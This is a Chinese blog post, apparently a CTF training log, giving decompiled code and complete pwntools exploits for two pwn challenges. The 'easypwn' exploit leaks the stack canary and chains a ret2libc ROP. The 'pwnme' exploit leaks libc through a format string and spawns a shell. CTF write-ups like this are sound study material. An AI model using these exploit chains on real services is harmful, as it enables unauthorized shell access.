暑假pwn训练(十二) 学不会阿自己好菜

最新推荐文章于 2023-04-09 14:32:02 发布
最新推荐文章于 2023-04-09 14:32:02 发布
阅读量338 收藏
点赞数
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/100013582
版权

记一下这几天做的pwn题目~~
i春秋的easypwn
很简单明显的栈溢出漏洞
常规的思路泄露libc然后构成shell

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-50h]
  unsigned __int64 v5; // [rsp+48h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&buf, 0, 0x40uLL);
  puts("Hello!I am the smartest robot in the universe!\nWho are you?");
  fflush(_bss_start);
  read(0, &buf, 0x100uLL);
  printf(
    "Your name %s sounds so stupid!\nBut you don't looks like a fool,isn't it?\nso why don't tell me your real name?\n",
    &buf);
  fflush(_bss_start);
  read(0, &buf, 0x100uLL);
  puts("Oh!This one is better,nice to meet you!\nGoodbye!See you again!");
  return __readfsqword(0x28u) ^ v5;
}

上面是main函数
直接上exp:

from pwn import *
from LibcSearcher import *
p=remote('106.75.2.53',10002)
elf=ELF('./easypwn')
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
pop_rdi=0x004007f3
main_addr=0x04006C6
p.recvuntil('Who are you?')
payload='a'*0x48
p.sendline(payload)
p.recvuntil('\x0a')
p.recvuntil('\x0a')
canary=u64(p.recv(7).rjust(8,'\x00'))
print hex(canary)
payload1='a'*0x48+p64(canary)+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main_addr)
p.recvuntil('your real name?')
p.sendline(payload1)
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(put_addr)
#0x7fd67582b690
#libc=LibcSearcher('puts',put_addr)

libcbase=put_addr-libc.symbols['puts']
system_addr=libcbase+libc.symbols['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
p.recvuntil('Who are you?')
payload3='a'*0x48+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)
p.sendline(payload3)
p.interactive()

然后还做了个pwnme这个有趣一些利用到了格式化字符串(我发现这个一般都要分开输入寻找偏移)emem一起输入的我不知道试了多久我这里用gdb调试发现__libc_start_main函数的偏移为11(6+5)然后就可以泄露这个函数的真实地址然后泄露libc就行了,还有一种是利用DynELF模块去泄露system地址然后调用read函数写入/bin/sh再getshell这里我就泄露libc就不要这么麻烦了
上exp:

from pwn import *
from LibcSearcher import *
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
p=remote('106.75.2.53',10006)
#p=process('./pwnme')
elf=ELF('./pwnme')
pop_rdi=0x00400ed3
pop_pop_pop_pop_po_ret = 0x400ecb
init_gadget=0x0400EB0
p.recvuntil('(max lenth:40):')
p.sendline('binbin')
p.recvuntil('(max lenth:40):')
p.sendline('1')
p.recvuntil('>')
payload='%11$s'
p.sendline('2')
p.recvuntil('(max lenth:20):')
p.sendline(payload)
p.recvuntil('(max lenth:20):')
p.sendline("AAAA"+p64(elf.got['puts']))
p.sendline('1')
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(put_addr)
libcbase=put_addr-libc.symbols['puts']
system_addr=libcbase+libc.symbols['system']
print hex(system_addr)
bin_sh=libcbase+libc.search('/bin/sh').next()
print hex(bin_sh)
p.sendline('2')
p.recvuntil('(max lenth:20):')
p.sendline('bin')
p.recvuntil('(max lenth:20):')
payload1 = 'A' * 0x28
payload1+=p64(pop_rdi)
payload1+=p64(bin_sh)
payload1+=p64(system_addr)
payload1=payload1.ljust(0x101,'a')

p.sendline(payload1)
#p.send('/bin/sh\x00')

#gdb.attach(p,'')
p.interactive()

emempwn好难对完全看不懂~~

doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 1923
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN栈溢出基础——ROP1.0
Gifoyle的博客
07-13 847
PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇) 在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每一步操作写出来。 参考ctf-wiki以及其他资源,参考链接见最后,文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码(.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets
[冀信2021-pwn] pwn19
weixin_52640415的博客
12-15 2565
这是一个简单的printf+溢出题,可以输入2次6位的串用来printf,然后输入串溢出。 int __cdecl main(int argc, const char **argv, const char **envp) { int v5; // [rsp+Ch] [rbp-34h] __int64 buf[5]; // [rsp+10h] [rbp-30h] BYREF unsigned __int64 v7; // [rsp+38h] [rbp-8h] v7 = __readfsq
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2
归子莫的博客
05-06 954
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]ydsneedgirlfriend2 下载...
逆向做题记录2023 4.3-4.9
m0_73718199的博客
04-09 1008
在某些编程语言或者汇编语言中,使用 dup 语句可以重复生成一定数量的相同元素,可以用来快速生成一定数量的数组或者缓冲区。在计算机编程中,8 dup(0) 表示申请 8 个字节(或者 8 个元素)的连续内存空间,并将该空间的值初始化为 0。该函数的参数为指向 FILE 结构的指针,指示要关闭的文件。fopen() 是一个 C 标准库函数,用于打开一个文件并返回一个指向该文件的指针。函数将写入任何挂起的缓冲区数据,释放与文件流相关的所有缓冲区,并关闭该文件。是 C 标准库中的一个函数,用于关闭打开的文件。
Pwn习路线及习笔记以及gem安装
10-15
同时,作者也认为Pwn需要实践和操作,需要自己搭建汇编语言运行环境,体验一下原生编程的快感。作者建议大家Pwn的同时,也习相关的安全知识,并实践操作。 五、总结 Pwn需要铺垫基础知识,了解...
pwn习资料整理——ROP技术(pwn_rop1)
08-30
pwn习资料整理——ROP技术(pwn_rop1)
pwn习总结(八)—— 堆(持续更新)
01-07
pwn习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
格式化字符串漏洞实验例子(一)easy
谭宇
03-10 634
1、goodluck 例子出处github,点击访问 checksec查防 root@user-virtual-machine:/mnt/hgfs/CTF/share/goodluck# checksec goodluck [*] '/mnt/hgfs/CTF/share/goodluck/goodluck' Arch: amd64-64-little RELRO:...
gcc的 printf 和 缓冲区的问题(关于fflush 函数)
Yasin Lee
06-28 5762
<br />以下程序只是为了在终端上不断连续输出->而已,但是在没有加fflush之前发现根本无法向屏幕打印任何内容。为什么以前从来没有发现 printf的这种特性呢?后来想到,以前在用printf时多收情况下都会在字符串尾部加一个/n。或者没有加/n,但是你的程序不是一个dead loop,便也不会牵扯到问题,因为就算执行printf后只是将内容送到缓冲区,但是你到程序结束里,程序结束便会导致缓冲区刷新,你便看到你到屏幕上 有你期望到东西出现了。所以我最后得到一个这样到结论:printf会把东西送
sync、fsync、fdatasync、fflush函数区别和使用举例
lhb0709的专栏
01-08 9261
Linux/unix在内核中设有缓冲区、高速缓冲或页面高速缓冲,大多数磁盘I/O(block device)都通过缓冲进行,当将数据写入文件时,内核通常先将该数据复制到其中一个缓冲区中,如果该缓冲区尚未写满,则并不将其排入输出队列,而是等待其写满 或者当内核需要重用该缓冲区以便存放其他磁盘块数据时,再将该缓冲排入输出队列,然后待其到达队首时,才进行实际的I/O操作。如上所说,假设内核一直没重用该缓...
PWN】IO_FILE的利用
u014377094的博客
05-05 1258
IO_FILE 的结构 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ streambuf protocol. */ /* Note: Tk uses the _IO_read_ptr and _IO_read
2018福建省“百越杯”CTF初赛writeup
SWEET0SWAT的博客
12-03 4560
2018福建省“百越杯”CTF初赛writeup PWN Boring Game 题目描述 nc 117.50.59.220 12345 解题经过下载下来后有两个文件pwn和libc.so.6。所以很明显是RET2LIBC的类型 检查文件安全性 程序源代码 int __cdecl main(int argc, const char **argv, const char **envp) { ...
GLIBC中的库函数fflush究竟做了什么?
一见
11-14 1020
目录 目录 1 1. 库函数fflush原型 1 2. FILE结构体 1 3. fflush函数实现 2 4. fclose函数实现 4 附1:强弱函数名 5 附2:属性__visibility__ 6 库函数fflush原型 先瞧瞧fflush的原型: #include <stdio.h> int fflush(FILE *stream);...
hctf[pwn] the-end
九层台
11-12 1999
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int i; // [rsp+4h] [rbp-Ch] void *buf; // [rsp+8h] [rbp-8h] sleep(0); printf(&quot;here is a gift %p, good luck ;)\n&quot;, &amp;a...
linux IO_FILE 利用
热门推荐
sky123博客
03-29 1万+
基本结构 _IO_FILE_plus 定义如下: struct _IO_FILE_plus { FILE file; const struct _IO_jump_t *vtable; }; 包括一个结构体 file 和一个指针 vtable 。 其中 vtable 指向一个函数指针表,很多 IO_FILE 的攻击都是围绕它展开的。 _IO_FILE_plus 类型的结构有 _IO_2_1_stdin_ 、 _IO_2_1_stdout_ 和 _IO_2_1_stderr_ 。另外有头指针 _IO_
pwn需要习哪些数知识
最新发布
05-18
5. 线性代数:在 pwn 中,矩阵运算和向量运算经常被用来解决密码和加密算法相关的问题,因此需要对线性代数有一定的了解。 当然,不同的 pwn 题目可能需要的数知识也会有所不同,但以上几个方面是比较基础和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值